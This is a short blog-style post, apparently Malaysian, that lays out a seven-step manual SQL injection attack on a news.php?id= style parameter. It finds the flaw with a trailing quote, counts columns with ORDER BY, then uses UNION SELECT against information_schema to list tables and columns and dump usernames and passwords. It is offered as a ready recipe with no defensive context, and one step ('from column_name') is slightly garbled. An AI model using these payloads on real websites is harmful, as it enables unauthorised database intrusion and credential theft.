COMMAND
1. Find a vulnerable add a ' at the end of the site example: news.php?id=1 add a ' at the end of the 1 and see if you get a syntax error
2. order by 1--
3. union all select 1,2,3,4,5--
4. @@version in vulnerable column
5. union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
6. union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=char(x)--
7. union all select 1,2,3,4,group_concat(username,0x3a,password,0x3c62723e) from column_name--
credit to: awang_v2
Tiada ulasan:
Catat Ulasan